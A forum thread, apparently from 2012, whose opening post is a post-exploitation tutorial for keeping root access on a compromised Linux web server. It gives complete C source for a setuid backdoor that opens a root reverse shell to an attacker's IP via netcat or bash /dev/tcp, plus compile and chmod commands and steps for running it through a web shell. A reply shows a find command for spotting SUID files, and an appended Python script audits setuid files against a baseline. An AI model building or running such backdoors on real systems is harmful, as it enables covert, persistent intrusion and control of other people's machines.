
Post Exploitation - Run backdoor with root privileges



b0nd
01-03-2012, 04:30 AM
Scenario:

You managed to slip into the target somehow; it could be by exploiting a network-layer vulnerability or through web vulnerabilities. Let's take the case of web vulnerability exploitation, e.g. SQL injection, and you managed to upload and run a web shell (c99, r57 etc.) there.
Further assumption: the web server is running as non-root, which is the general case and recommended. You spawn a reverse-connect interactive shell and, by running a local privilege escalation exploit, manage to escalate privileges to the root account.
With root access you can of course do anything: create a new account with root privileges, or escalate the privileges of the web server account so that the reverse connect gives root privileges, etc. But these raise eyebrows and could be detected easily.

Another, smarter move could be to make your backdoor always run as root even when executed by a normal user and spawn a root shell: a SUID shell backdoor. This method is recommended when you have constant non-root access to the target.

Case 1. Execute netcat through the web shell to spawn a reverse-connect interactive shell with root privileges:
Prerequisites: Either nc is already there or you upload one, and you have root access at the moment to run commands.

Create a C backdoor: backdoor.c


#include <stdio.h>
#include <stdlib.h>   /* exit(), system() */
#include <string.h>
#include <unistd.h>   /* setuid() */

int main(int argc, char* argv[])
{
    char cmd[1024];
    /* both argv[1] (IP) and argv[2] (port) are used, so require three arguments */
    if(argc < 3) { printf("Please enter IP address and port.\n"); exit(0); }

    setuid(0);   /* effective uid 0 comes from the setuid bit set with chmod below */
    /* snprintf bounds the write; the original strcpy/strcat chain could overflow cmd */
    snprintf(cmd, sizeof cmd, "/bin/nc %s %s -e /bin/bash", argv[1], argv[2]); // or the relative path where netcat resides

    system(cmd);
    return 0;
}
// Executing: /bin/nc <IP> <Port> -e /bin/bash

Setuid is an access right flag which can be set on a binary. When it is set, it permits a non-root user to execute it with root privilege.

Compile with:


root$ gcc -o backdoor backdoor.c

Now set the setuid bit:

root$ chmod 4755 backdoor

or

root$ chmod a+s backdoor


Now the execution of the backdoor binary by a non-root user would spawn a netcat reverse connect with root privileges.

Case 2. Use the "netcat without netcat" technique to spawn a reverse-connect interactive shell with root privileges:
Prerequisite: /dev/tcp is available to use. Though I am not sure, in a few of the recent *nix distros it's disabled.

Compile the following code as we did in Case 1:

#include <stdio.h>
#include <stdlib.h>   /* exit(), system() */
#include <string.h>
#include <unistd.h>   /* setuid() */

int main(int argc, char* argv[])
{
    char cmd[1024];
    /* both argv[1] (IP) and argv[2] (port) are used, so require three arguments */
    if(argc < 3) { printf("Please enter IP address and port.\n"); exit(0); }

    setuid(0);   /* effective uid 0 comes from the setuid bit set with chmod, as in Case 1 */
    /* bash's /dev/tcp pseudo-device replaces netcat; snprintf bounds the write into cmd */
    snprintf(cmd, sizeof cmd, "/bin/bash -i > /dev/tcp/%s/%s 0<&1 2>&1", argv[1], argv[2]);
    system(cmd);
    return 0;
}
// Executing: /bin/bash -i > /dev/tcp/10.10.0.1/8080 0<&1 2>&1

Finally execute the binary through web shell:

/absolute or relative path/backdoor [IP Address] [Port]

The overall dependencies of this method:
1. PHP shouldn't be hardened to disable all of the following functions, which would prohibit you from executing commands through your web shell:

passthru
exec
system
shell_exec

Cheers and Happy Hacking!

neo
01-03-2012, 09:49 AM
Nice post, after a long time seen you in action bond :)
Well, but whenever I do an audit of a *nix system I always do

find . -type f \( -perm -4000 -o -perm -2000 \) -exec ls {} \; 2>/dev/null
to find out the suid files in the system ;-)

b0nd
01-03-2012, 10:57 AM
Nice post, after a long time seen you in action bond :)
Well, but whenever I do an audit of a *nix system I always do

find . -type f \( -perm -4000 -o -perm -2000 \) -exec ls {} \; 2>/dev/null
to find out the suid files in the system ;-)
:) I shall amend the "overall dependencies" above and mention that the pentester should not be smart enough to look for suid files.

btw, credit for "netcat without netcat" goes to you for introducing the technique to me earlier. I use that quite often now.
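A defender's version of the audit neo describes, as an added example that is not part of this thread: it scans a tree for setuid/setgid regular files (lstat, so symlinks are never followed, and unreadable paths are skipped the way the find one-liner's 2>/dev/null does) and diffs the result against a known-good baseline, so a freshly planted SUID binary like the one in the first post shows up as NEW rather than being lost in the list of stock ones. SAMPLE_ENTRIES and BASELINE are constructed values, not real system data; pass a real root to audit() for a live scan.

```python
import os
import stat

SETID_MASK = stat.S_ISUID | stat.S_ISGID

def walk_modes(root):
    """Yield (relative path, st_mode) for every file below root.
    lstat is used so a symlink is reported as a link, never followed."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                yield os.path.relpath(path, root), os.lstat(path).st_mode
            except OSError:
                continue  # unreadable or vanished: skip, like 2>/dev/null on find

def setid_files(entries):
    """Keep only regular files with setuid or setgid set -> {path: permission bits}."""
    return {p: stat.S_IMODE(m) for p, m in entries
            if stat.S_ISREG(m) and m & SETID_MASK}

def diff_setid(baseline, current):
    """Compare a scan against the known-good baseline: (new, changed, removed)."""
    new = sorted(p for p in current if p not in baseline)
    changed = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    removed = sorted(p for p in baseline if p not in current)
    return new, changed, removed

# Constructed sample scan (not real data): a stock SUID binary, a normal binary,
# a setgid binary that gained setuid, a planted SUID backdoor under the web root,
# and a symlink carrying the bits (ignored, since S_ISREG fails for it).
SAMPLE_ENTRIES = [
    ("usr/bin/passwd", stat.S_IFREG | 0o4755),
    ("usr/bin/ls", stat.S_IFREG | 0o755),
    ("usr/bin/wall", stat.S_IFREG | 0o6755),
    ("var/www/uploads/backdoor", stat.S_IFREG | 0o4755),
    ("tmp/link", stat.S_IFLNK | 0o4777),
]
# Constructed baseline, as recorded on a clean install of the same host.
BASELINE = {"usr/bin/passwd": 0o4755, "usr/bin/wall": 0o2755, "usr/bin/chage": 0o4755}

def audit(root=None, baseline=BASELINE):
    """Audit a live tree (root) or, when root is None, the constructed sample."""
    entries = walk_modes(root) if root else SAMPLE_ENTRIES
    return diff_setid(baseline, setid_files(entries))

if __name__ == "__main__":
    for label, paths in zip(("NEW", "CHANGED", "REMOVED"), audit()):
        for p in paths:
            print(f"{label}: {p}")
```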